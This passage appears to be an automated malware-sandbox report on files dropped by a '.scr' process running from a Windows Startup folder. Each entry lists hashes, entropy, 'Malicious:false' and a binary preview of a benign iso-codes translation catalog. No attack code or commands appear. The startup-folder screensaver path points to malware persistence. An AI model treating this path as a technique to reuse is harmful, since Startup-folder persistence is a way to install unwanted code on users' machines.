                                                                                                    Preview:................l...............................................................$.......7.......B.......I......._..."...@...2...c...........................@...................3...?...I........................................................Al Fujayrah.Andorra la Vella.Canillo.Dubayy.Encamp.Escaldes-Engordany.La Massana.Ordino.Sant Juli. de L.ria.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-08-03 12:41+0000.Last-Translator: Oymate <dhruboadittya96@gmail.com>.Language-Team: Bengali (Bangladesh) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/bn_BD/>.Language: bn_BD.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.2-dev.... .................... .. ...................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_639-5 '\340\246\206\340\246\253\340\247\215\340\246\260\340\247\213-\340\246\217\340\246\266\340\247\200\340\246\257\340\246\274 \340\246\255\340\246\276\340\246\267\340\246\276\340\246\270\340\246\256\340\247\202\340\246\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2772
                                                                                                    Entropy (8bit):5.181581733023236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rEKk9jGQU2FvmYJ7K76pCUtStwoc9yZ/3dVsPhNeL/O:gzz7KKClwoZZ/3dV6NerO
                                                                                                    MD5:817C2372F58A11787FA2096B6F455762
                                                                                                    SHA1:7458308183EAF15A2FEDB4C47F1EA1D0CCE3B634
                                                                                                    SHA-256:C577DDE882B2CC5736749B6C0526B9FF498109106F3F3EED09C21DDCD8C3CC9F
                                                                                                    SHA-512:CFD2DB8730A2D9FD3E3463265FC5C82B4F3194E5150084A3706553048B3C73F47F20755C2E41F1006C50C08453AF8A7C120C6B8A86BC049F0BBD9F1AABD2C0F4
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................,.......A.......Z.......o...............................................................................$.......5.......F.......W.......j...........................8.......7...............+.......%...C..."...i...+.......".......1.......8...........F...>...u..."......."...........................:.......W.......w..."...........................................4...2...T...........,............................................................................................................................................................................Afro-Asiatic languages.Alacalufan languages.Algic languages.Algonquian languages.Apache languages.Arauan languages.Arawakan languages.Artificial languages.Athapascan languages.Atlantic-Congo languages.Australian languages.Austro-Asiatic languages.Baltic languages.Bamileke languages.Banda languages.Bantu languages.Batak languages.Berber langu
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 425 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\244\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36015
                                                                                                    Entropy (8bit):4.954295197816621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SNMJadAvPQfmsWP48WAI/6kCcOX9CdszX8ZrX6HxHarJXdRXdydpdQtCdr+bBKfe:k6yAvY3G/HErjrGjG28tM3PREfKOUIiM
                                                                                                    MD5:E1DA1C294A1A3A36EA3307F0CD47981B
                                                                                                    SHA1:2414809A78552E33D090D5847EE54B348E1463C6
                                                                                                    SHA-256:E4FC77F758FEF79AEAFD808A8D0817459D737D95D6863B5708776D778CB02CD6
                                                                                                    SHA-512:0892E4B9EEDC2FACA2576A98071F78CA01B619F593B72E0C18AFB92409B58F444E66068CBB0153E3224DD73FDAE918E6CABC13039F2CB960F5F5837600FD66F3
                                                                                                    Malicious:false
                                                                                                    Preview:................d...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......5$......?$......G$......R$......Z$......b$......m$......v$......~$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......#%......,%......:%......A%......`%......w%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......-&......6&......O&..,...k&.......&.......&..%....&.......&.......&.......&.......&.......&.......&.......'.......'.......'..%...''..,...M'.."...z'..*....'.......'.......'.......'.......'.......'.......(.......(.......(......+(......=(......E(......M(......V(......_(......{(..'....(..$....(.......(.......(.......)......*)......I)......g)......l)......t)......{).......).......).......).......).......).......).......).......).......).......).......*.......*......&*......0*......8*......C*......H*......R*......[*......b*......p*......w*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\246\260\340\246\277\340\246\237\340\246\277\340\246\266 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\246\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4091
                                                                                                    Entropy (8bit):5.164247865780025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDE19yBowUQXoQUXggt7X6G2Z2XhZ+5hC03XampXsYPdIPl:qDElwJXbUXxt7XDXh+Y03XdpXTPdIPl
                                                                                                    MD5:F9A2B5B554788F1EB82BB0E35A667383
                                                                                                    SHA1:91965153452939271D0D74B12A4CDAD7D34BD81B
                                                                                                    SHA-256:A48A6D190A44F1DE67BB32F48D36092CFBF725963483152E08C5A07572344E04
                                                                                                    SHA-512:CBF966D467E9EE219D644CF0B1EB0500E474DA568A831A5DCE7CDFB1A50EF20B1C9B5AF86280731AA24857E0AA92467AE6C70DEAA8AA3847BD1A816B8897C57E
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................G...c...u...........!...Z.......................2...............?.......6...:...^...q...Y.......H...*..."...s...1.......I.......%......."...8...\...[...,.......>...........$...+...:.......f...........A...y...].......+...........E...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 124 messages, Project-Id-Version: iso_15924 'Arabeg'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6545
                                                                                                    Entropy (8bit):4.935566122000586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4nYQAonx1a6ESLUuuCzyKONK5qr0f4WgESaVJlxYsNVk0MzxNtLUPkjvT:wYQNnx1a6ExXknV4mSaFnVvkegb
                                                                                                    MD5:48CD9780450781BC862B61F2F802AE5E
                                                                                                    SHA1:6DA2236D818589B14A1F91494D6DDF009DC2A5AD
                                                                                                    SHA-256:147700E01F071FAB56F6CE95DFC33545A9D1F2F2C23F04F952AB34C4A5209B5B
                                                                                                    SHA-512:56F80BE6C9F2EB1D967A809099DEF6DF80B17FED5B6D78380CA0CF80A6FE099D542793012DCF64A7F32E37F895809B3AD0E7B2A11CA19AF6519E036F136EBBB3
                                                                                                    Malicious:false
                                                                                                    Preview:........|.......................x.......y.......................................................................................................................................................".......?.......\.......c.......~...........&...........................................................%.......:.......E.......L.......R.......[.......d.......~.......................................................................&.......=.......l.......u.......|...................................#...................................................$.......3.......9.......B.......K.......R.......Y.......c.......u...................................(.......................................#...%..."...I.......l.......w........................................................... ...........................................$......./.......>.......J.......R.......\.......i.......q.......x...........................................................................................................%...#.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 229 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10555
                                                                                                    Entropy (8bit):4.822454275313783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TCC/AWKo5hjuUk3S6nv2879Ti4EhzugoRuxODW2qUQZW+Ew:T5YUUSMt9W4EdugoRuxODW2QZrEw
                                                                                                    MD5:19660B85F115D0F2D03C763AAF5FEE54
                                                                                                    SHA1:9310B9BFFFA12062F738FD476940B53BA26D6883
                                                                                                    SHA-256:017C7787D25B268BAF4D070A293FA08DD81DE6D86EB553288276F70A9DFAA042
                                                                                                    SHA-512:CE48CB17AB8956B07EC52EBE2EF70BE772D7095B1E0613A8E406655B0373364A36C593424216A2DFF14DEA5BBA43C80169ACA3931057669A7457AA1396A27E1B
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8.......9.......E.......M.......U.......d.......l.......s.......|...............................................................................................................................................,.......5.......C.......J.......i...............................................................................................................................&.......1.......9.......>.......G.......N.......].......e.......n.......w...................................................................$...................!.......&...............5.......C.......T.......Z.......b.......j.......p.......z...................................................................................!...................................................#.......-.......2.......:.......F.......M.......S.......[.......a.......h.......o.......z.......................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 21 messages, Project-Id-Version: iso_3166-3 'Tachennad Antarktika eus Breizh-Veur'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2105
                                                                                                    Entropy (8bit):5.24124262568481
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aBxaac6YqahSGe4wMlkauOEfnq7BikHOWUoc0jNY5t0U12cwu1LXmjBoRKvmlZtY:WYaSSE0vzodjNYoUVwLNeGnafM0g
                                                                                                    MD5:764B31D2707EC0A846D19CB378037B54
                                                                                                    SHA1:490C911A146667B7635E28A0634EC5BBE03E8EBF
                                                                                                    SHA-256:343C040B708E4B8E8F5323F1BE2AB3DC57173EEE0430F0FD99F15FD0EBF83103
                                                                                                    SHA-512:3B2DDED28CF4207A70B76BF2DE76F6CBE9E0C09521F76EDB4449D96F6CAF0446AFC331C71D9FB67B9EF1CCB9577D47DE2FD18ACA6F40B1712D38DB9648314BD1
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...................).......*...'.......R.../...o...........................)...................#.......8.......E...!...R.......t... .......)............... .......2...........>...$............... ...........@...2...[...................'.......0...................%.......=.......M.......].......k...+.......(...............$.......'............................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dronning Maud Land.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.German Democratic Republic.Netherlands Antilles.Neutral Zone.New Hebrides.Pacific Islands (trust territory).Panama Canal Zone.US Miscellaneous Pacific Islands.USSR, Union of Soviet Socialist Republics.Upper Volta, Republic o
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 99 messages, Project-Id-Version: iso_4217 'Afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4788
                                                                                                    Entropy (8bit):4.707143861978661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fR1C5nDDu9EWe8htqlXr8pSm94LtO1XlJTuoAhSKCP/P6uKmUIL1eWSh96dxK+k4:fRwVvge8hM+uIF3ZKgPdKmDxvEnLq
                                                                                                    MD5:11524274029787F59776D0CBEAF460B5
                                                                                                    SHA1:4CC18672057D250649CDCB2B3E9C216EB96D81FE
                                                                                                    SHA-256:DADA41F045B4B5C6CB2A2A12D6857E427712E0282DF14076526ED8D48ADDFF01
                                                                                                    SHA-512:5640C8059A3A7CA05F15A5BAC3BE9B3691148B06D91AA0EF54E3A7433336E0E9A70BDD2C06A6E23CDB74555BFEAC7B759F0F3F7F5F624843452B3D4051252D2F
                                                                                                    Malicious:false
                                                                                                    Preview:........c.......4.......L.......p.......q.......y.......................................................................................................-.......<.......F.......\.......n.......{....................................................................................................................... ...............;.......H.......T.......d.......t.......y...............................................................................................................................-.......?.......R.......[.......l.......t.......................................................................................................................(.......,.......<.......C.......S.......b.......n.......{...........................................................................................................*...........*.......1.......@.......R.......`.......r...............................................................................................................-.......:.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 797 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32879
                                                                                                    Entropy (8bit):4.778092378665384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ajm4lx9nsTOM2EF/XugkY7rAhThBW25hklW1E:aa0nsT53XANhB9hnE
                                                                                                    MD5:78D4C7A3627AEDC544CAF10D73A596B9
                                                                                                    SHA1:3996DB2056595636FCFF7C951E98507D4A676615
                                                                                                    SHA-256:2B824BD8576585861E039250713A505BDB083B7E8122ED09717E5E17E2FF24ED
                                                                                                    SHA-512:1E65B0D2AABEC5627C536F059D0FC78EBAB1C221EADB8C31EC2B394E033A61C1EE68CB8781BBFDB9C1AA48DF8DBAC5457CF0C7E455E67B62428CC7DED9D78652
                                                                                                    Malicious:false
                                                                                                    Preview:....................'....1.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C.......C......#C......(C......-C......3C......8C......@C......GC......OC......TC......]C......iC......xC.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......D.......D.......D.......D.......D...... D......&D......+D......@D......GD......PD......ZD......bD......jD......pD......~D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......E.......E.......E.......E.......E......$E......+E......1E......8E......>E......EE......RE......_E......eE......mE......sE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F.......F...... F......%F......-F......6F......>F......EF......JF......RF......XF......]F......dF......iF......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 403 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22283
                                                                                                    Entropy (8bit):5.037719040354388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:U/5+7GsHFJZZSkFJx3DMSg8J8jo5wsOP4XJOAE+irN6f9PaL94nBcO:U/5+aUFJZgkLxTcMmsOP4XJOAEmyx4l
                                                                                                    MD5:D9128EF0BE6343F6ACFD815EBDABCD92
                                                                                                    SHA1:2B8DEF7F6EAA5C166B084A912AFFEECE7A8B306B
                                                                                                    SHA-256:8D7B2DE7F26CA6FF6A4A8DFB1C313F57CF23E1D98E9D50CB927D0A263FB64257
                                                                                                    SHA-512:A5246690D36662641C959A67E6E1FD0098896A61E0C295D8DFD3A78C27CA37867C192599A089FC56047DE12EF4C4A96AEFCD025EC756D350A05F6496990BCC8A
                                                                                                    Malicious:false
                                                                                                    Preview:........................L........!.......!.......!.......!.......!.......!.......!.......!......."......."......#"......:"......D"......W"......_"......e"......o"......w".......".......".......".......".......".......".......".......".......".......".. ....".......".......".. ....#......<#......S#......\#......j#......q#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......#$......)$......:$......R$......[$......t$..,....$.......$.......$..%....$.......$.......$.......%.......%.......%.......%......&%......5%..%...D%..,...j%.."....%..*....%.......%.......%.......%.......&......&&.......&......4&......@&......R&......Z&......b&......k&.......&..'....&..$....&.......&.......&.......'......9'......W'......\'......d'......k'......y'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(...... (......((......3(......8(......B(......K(......R(......`(......g(......m(..!....(.......(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 69 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3326
                                                                                                    Entropy (8bit):4.729052841878372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dPzP7nOrDNwTqRt72mbpx1hHla6/TaEm9mh1hrlaJ:VzP7WwTqRN2ixkeRxhgJ
                                                                                                    MD5:4AF40B202622E150934AC662BDC0FD74
                                                                                                    SHA1:6970E9AD93C7D612A3348D32FB82089D8F635DE8
                                                                                                    SHA-256:4AA0AC02EBBF25FA32CDD90A76EFE1E1144896F204843B4AC3B19C7E7DC16E51
                                                                                                    SHA-512:A2BA5835927F692DF8C8AC4CDF946614C079513A0A810BB10EE5AA4EB4A4A38E8EFBEFA4EAA8DA43FDA8ADD6592F47CDC70405FECFE7E08DBC303C118624EE12
                                                                                                    Malicious:false
                                                                                                    Preview:........E.......D...a...l....................................................... .......&.......-.......>.......J.......S.......\.......q.......z...............................................................................................................................................................#.......,.......3.......A.......O.......Z.......e.......n.......t...............................................................................................................!.......0.......=.......G...$...M.......r.......w...................................................|...........6.......>.......F.......N.......^.......g.......m.......t.......................................................................................................................................................%.......*.......3.......A.......J.......T.......`.......i.......r.......y.......................................................................................................................'.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanska Antarkti\304\215ka Teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2593
                                                                                                    Entropy (8bit):5.21063515258434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADNZVJ6fQvGqIfdvqNuoUiVbNRSpwclmoOdHCVXyFfinoqotl:qDr6fQyBoFnwdmUVXyIXU
                                                                                                    MD5:E55BDB1473E59B0F2182E8A7370EE39B
                                                                                                    SHA1:E8B3DCF307CECC617CCB870A3CAE0805E8067F05
                                                                                                    SHA-256:BE677EAFFFFB09F10FEE534B28EE5769345B97BE1C0F481FF635D8E601DBD18B
                                                                                                    SHA-512:49325003D28F521498A97DAEE8D9F3146DF34BC62A59212CE0D700424A8D22AAD628831C7A162B8B7F7E52FD9E361370B0107C42F0CAE5BFEE4277DA5471BD31
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..........._.......!.......&...+...2...R...........8...............................................*...2.......].......}...........................................,...................".......5.......<.......L...1...h...........................1....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 52 messages, Project-Id-Version: iso_639-3 'Azerbejd\304\221anski'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2394
                                                                                                    Entropy (8bit):4.654539620068959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ErMzBplQfM7TtuAz0W/sGFgRxzYMUNy2C6DrGInyF:iMdpWfqGBYMx2C63fnu
                                                                                                    MD5:1A0B9A12E1F51B94492CB88DE5DEA0EE
                                                                                                    SHA1:8EAB8CCFF0D62A2C87DA231F31111EB07FD30C45
                                                                                                    SHA-256:969DCB500BE2C72FE9FDA848F32E6DE1BF99221F23A467346E33CCC326DC5B4A
                                                                                                    SHA-512:CE209C54F5648931D6A6B1E3F20BA017A22E007C1513055F5F28D9B9C9F8642A2E797AF070D61203B0DDF3838B91596A2B0DBE0B4B9F1B89AB062A11C4D4329C
                                                                                                    Malicious:false
                                                                                                    Preview:........4...........G...\.......x.......y............................................................................................................................................................... .......'.......1.......;.......F.......L.......T.......].......d.......l.......t...................................................................................................................................................................W... .......x.......................................................................................................................................#.......*.......4.......>.......H.......S.......].......i.......o.......z.......................................................................................................................................................'.......2.......9.......E.......N.......T.......1...,...-...........2.......................$...*...........)...................&...........+...........................'...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5711
                                                                                                    Entropy (8bit):5.024477099815847
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5IFFlaRFMO89kjFbEylUyAWcBwG7YG/wLYpoikXLyCviLz:iIb0FbEKt2ZfoLz4
                                                                                                    MD5:BA3AF0F8274254AA34F2C8C71B07FEF9
                                                                                                    SHA1:3CDEB5B459C60B422EE357AD95E3153A9F4F2166
                                                                                                    SHA-256:CE69B465191851F87FEB059F9BCE45573C0135A2FDC1E4CE9A452B1EC266E70A
                                                                                                    SHA-512:4C22AE98B37838802E3009EDE7BFC827C71BB1D123EFBDFFB146AEF6062D39706EF0109F7D7999D456B439BE891B73AC19A404FE733BEB35425F4ECC9DBA1521
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................M...................%.......5.......B.......U.......e.......{.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):474
                                                                                                    Entropy (8bit):5.376342172855304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i3s1xjt02UkLKcG/Ki4FLuvWXmBQWihjEl:Ms5t0UPKKzFiOXm6M
                                                                                                    MD5:8E65B8FB5AE1E6C9DC14E529A7BE1173
                                                                                                    SHA1:EC09478DD195F59047806E570D4D9BBD4AE1B3EC
                                                                                                    SHA-256:8709FA97DE961157F980C303D03FAC7811CDCCD36B3D13D751C9CDA10361E40D
                                                                                                    SHA-512:4BCDD44D954329167655244D674B6414C80D7AF3DFC4B4BB6C3A50A89380DA63369951706BE0D4A43E56286E328D3B9212A14990ADB7916318E6470A13D07F18
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...M...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Blin.Language: byn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5693
                                                                                                    Entropy (8bit):4.867788659332964
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHKiisAEmrG+Kbpy95Mo9Yk2pL5lsx2OrtZFdjVoEP0GCuk:k0u8yisWG+KU9qDlIkOrtZrjnMuk
                                                                                                    MD5:3564D55B70D576A9BACA6927E22376E2
                                                                                                    SHA1:6E16CEEC08EF53DD405A5B0CC3E2DF05CD169257
                                                                                                    SHA-256:53AB888121379F2AAF98711E821E707B9A98F763D0DBF4D0C3CBD8DC51DA3E96
                                                                                                    SHA-512:CA018BCAB4C2CCCE1E78C024C3C39E03AB3906DE06CDF3513F4FD3DC3BD7786D645CC4D8610B7ECAF18BA8231920E90B5D1289B7FAB9438AD77F9A01B699F245
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................I...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 49 messages, Project-Id-Version: iso_15924 '\303\240rab'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2945
                                                                                                    Entropy (8bit):4.931979927219547
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:JVmYz+iznQXZVbuyS2YvJwvd4Mma3NKV8HRlUA51IQDg+MGcBAYzuLjaVFb3Gbti:fyYniZR6ivd4Mma3SSRl75yQk+MGcCYR
                                                                                                    MD5:ED78D3F85607BC72C7D2AD804F969F09
                                                                                                    SHA1:8F01D67BAE26F571D0974FB61623E0DE1B1F8B93
                                                                                                    SHA-256:34B5FA1F824F71892F712E68C1699A34D4637A4BB2565C882C5C9E4386D0B4ED
                                                                                                    SHA-512:166E1785B8A5948E6AE0126DF917447AB49DA50ACA680903DE269B362E1BEE49E67CFA365D3A9E664F056420D939EEE110B6D5D8C2766B9BFC004EDBEC701FE9
                                                                                                    Malicious:false
                                                                                                    Preview:........1...........C...,.......8.......9.......@.......I.......Q.......Z.......b.......n.......v...............................................................................2.......9.......?.......X.......r.......y.............................................................................../..."...9.......\.......h.......n.......y...........................................................................................................................................................!......."...#.......F.......f.......l.......u...........................................................................,...........;.......A.......a.......h...........................................!........................................................... .......=.......D.......K.......O.......W.......i.......s...............................................................................................#...'............... .../...........0...,...1...........-.......".......................%.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23927
                                                                                                    Entropy (8bit):5.0537594274300925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosm8vUPr8o46nbjz5wsWP48WAINiZGk7fAuLpfdAARXgKc3T:0or8Mj8o48fmsWP48WAIBuLvAsXgKW
                                                                                                    MD5:10F4A74B294CCB911A85C69E620138AF
                                                                                                    SHA1:AC4D659DA3B2169E95B55C1C9B6D68A77C25A8C4
                                                                                                    SHA-256:C6200415D8466119413DF00A1E375B318724C096B447D44BA32A8C97B5918937
                                                                                                    SHA-512:AE06BA47654DEB47670CB7C80DAD7AFAAC7BD161C71D2F774C7504BD2C7C101AE6468627704436F7024AD5483AC3D5A946943987011A09B04D3F6CE1D7DF5C64
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 96 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4601
                                                                                                    Entropy (8bit):4.818690266789457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mTUzvFy8LB3fzcpIcDGbMA1hJqRlaI/aRYtamWg1uuJR91:mkQ81PjajAFNIDTWgLN1
                                                                                                    MD5:F94AD1069F6C9B4EE1DB164D44F76A4C
                                                                                                    SHA1:5EB4E9C33AE17E8384748461BDE4E283B1CEB348
                                                                                                    SHA-256:C22B990F8B842ECB02E7CC339CC9D446C80133D56239CC6C36AF3DB0F9206EE4
                                                                                                    SHA-512:A3343B2EE64F95DAF1C23293911996CA90518C7EDE685E215CE4F7B0AA8A8A21C6D7B9DE32B390C67B2B4469C70F0ED80720C493AFD5438603F4CDB524641980
                                                                                                    Malicious:false
                                                                                                    Preview:........`.......................(.......).......1.......8.......A.......I.......R.......a.......l.......}....................................................................................................................... .......,.......3.......<.......E.......L.......U.......j.......s.......z.......................................................................................................................................................%...............8.......D.......M.......V.......].......k.......y.............................................................................................................................../.......M.......Y.......`.......m...........................................$...................................................................".......(......./....................................... .......(.......8.......B.......S.......Z.......c.......i.......s.......{.......................................................................................
